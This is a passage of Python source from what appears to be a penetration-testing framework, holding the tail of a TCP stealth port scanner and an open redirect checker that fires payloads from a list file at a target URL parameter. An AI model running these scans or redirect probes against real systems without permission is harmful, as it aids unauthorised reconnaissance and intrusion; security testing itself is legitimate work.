#print(R+' =================================\n')
from core.methods.print import pscan
pscan("tcp stealth scan")
if properties["INIT"][1] == " ":
min_port = input(C + ' [§] Enter initial port :> ')
else:
min_port = properties["INIT"][1]
if properties["FIN"][1] == " ":
max_port = input(C + ' [§] Enter ending port :> ')
else:
max_port = properties["FIN"][1]
open_ports = []
closed_ports = []
ip_host = socket.gethostbyname(target)
if properties["VERBOSE"][1] == " ":
chk = input(
C + ' [?] Do you want a verbose output? (enter if not) :> ')
verbose = chk != ""
else:
verbose = properties["VERBOSE"][1] == "1"
try:
print(GR + ' [*] Checking port range...')
if int(min_port) >= 0 and int(max_port) >= 0 and int(
max_port) >= int(min_port) and int(max_port) <= 65536:
print(P + ' [!] Port range detected valid...' + C)
time.sleep(0.3)
print(GR + ' [*] Preparing for the scan...')
pass
else:
print(R + "\n [!] Invalid Range of Ports")
print(" [!] Exiting...")
quit()
except Exception:
print(R + "\n [!] Invalid Range of Ports")
print(" [!] Exiting...")
quit()
ports = range(int(min_port), int(max_port) + 1)
prtlst = listsplit(ports, round(len(ports) / processes))
starting_time = time.time()
SYNACK = 0x12
RSTACK = 0x14
checkhost(target)
print(G + " [!] Scanning initiated at " + strftime("%H:%M:%S") + "!" +
C + color.TR2 + C + "\n") # Confirm scan start
with Pool(processes=processes) as pool:
res = [
pool.apply_async(portloop, args=(
l,
verbose,
ip_host,
)) for l in prtlst
]
#res1 = pool.apply_async(portloop, )
for i in res:
j = i.get()
open_ports += j[0]
closed_ports += j[1]
print(G + "\n [!] Scanning completed at %s" %
(time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
ending_time = time.time()
total_time = ending_time - starting_time
print(P + ' [*] Preparing report...\n' + C)
time.sleep(1)
openports = " {}{}{}{}{}{}{}{} ports open.".format(
color.TR5, C, G, str(len(open_ports)), color.END, color.TR2,
color.END, color.CURSIVE)
summary("tcp stealth", openports)
print()
print(P + ' +--------+------------------+')
print(P + ' | ' + GR + 'PORT ' + P + '| ' + C +
'STATE ' + P + '|')
print(P + ' +--------+------------------+')
if open_ports:
for i in sorted(open_ports):
c = str(i)
if len(c) == 1:
print(P + ' | ' + C + c + P + ' | ' + C +
'OPEN ' + P + '|')
print(P + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 2:
print(P + ' | ' + C + c + ' ' + P + '| ' + C +
'OPEN ' + P + '|')
print(P + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 3:
print(P + ' | ' + C + c + ' ' + P + '| ' + C +
'OPEN ' + P + '|')
print(P + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 4:
print(P + ' | ' + C + c + ' ' + P + '| ' + C +
'OPEN ' + P + '|')
print(P + ' +--------+------------------+')
time.sleep(0.2)
elif len(c) == 5:
print(P + ' | ' + C + c + ' ' + P + '| ' + C +
'OPEN ' + P + '|')
print(P + ' +--------+------------------+')
time.sleep(0.2)
print('')
data = "Open Ports: " + str(open_ports)
save_data(database, module, lvl1, lvl2, lvl3, name, data)
else:
save_data(database, module, lvl1, lvl2, lvl3, name,
"No open ports found.")
print('' + R + " [-] Sorry, No open ports found.!!")
print(C + '\n [!] ' + str(len(closed_ports)) +
' closed ports not shown')
print(G + " [+] Host %s scanned in %s seconds" % (target, total_time) +
C + color.TR2 + C + "\n")
except KeyboardInterrupt:
print(R + "\n [-] User Requested Shutdown...")
print(" [*] Exiting...")
quit()
def openredirect(web):
print(GR+' [*] Loading module...')
time.sleep(0.6)
#print(R+'\n ===========================================')
#print(R+'\n O P E N R E D I R E C T C H E C K E R')
#print(R+' ——·‹›·––·‹›·——·‹›·——·‹›·––·‹›·——·‹›·——·‹›·–\n')
from core.methods.print import pvln
pvln("open redirect checker")
try:
param = input(O+' [#] Scope parameter to test (eg. /redirect.php?site=foo) :> ')
if '?' in param and '=' in param:
if param.startswith('/'):
m = input(GR+'\n [!] Your path starts with "/".\n [#] Do you mean root directory? (Y/n) :> ')
if m == 'y':
web00 = web + param
elif m == 'n':
web00 = web + param
else:
print(R+' [-] U mad?')
else:
web00 = web + '/' + param
else:
print(R+' [-] Your input does not match a parameter...')
param = input(O+' [#] Enter paramter to test :> ')
pa = input(" [?] Parallel Attack? (enter if not) :> ")
parallel = pa is not ""
print(GR+' [*] Configuring relative headers...')
time.sleep(0.8)
gen_headers = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
'Accept-Language':'en-US;',
'Accept-Encoding': 'gzip, deflate',
'Accept': 'text/html,application/xhtml+xml,application/xml;',
'Connection':'close'}
print(O+' [!] Enter path to payload file '+R+'(Default: files/payload-db/openredirect_payloads.lst)')
fi = input(O+' [#] Your input (Press Enter if default) :> ')
if fi == '':
fi = 'files/payload-db/openredirect_payloads.lst'
getPayloads0x00(fi)
else:
if os.path.exists(fi) == True:
print(G+' [+] File found under '+fi)
getPayloads0x00(fi)
else:
print(R+' [-] File not found... Using default payload...')
fi = 'files/payload-db/openredirect_payloads.lst'
getPayloads0x00(fi)
input_cookie = input("\n [#] Got any cookies? [just enter if none] :> ")
if(len(input_cookie) > 0):
gen_headers['Cookie'] = input_cookie
print(GR+' [*] Configuring payloads with Url...')
success = []
if not parallel:
check0x00(web00, gen_headers, payloads)
else:
paylists = listsplit(payloads, round(len(payloads)/processes))
with Pool(processes=processes) as pool:
res = [pool.apply_async(check0x00, args=(web00,gen_headers,l,)) for l in paylists]
for y in res:
i = y.get()
success += i
if success:
print(" [+] Open Redirect Vulnerability found! Successful payloads:")
for i in success:
print(i)
else:
print(R + "\n [-] No payload succeeded."+C)
except KeyboardInterrupt:
print(R+' [-] User Interruption Detected!')
pass
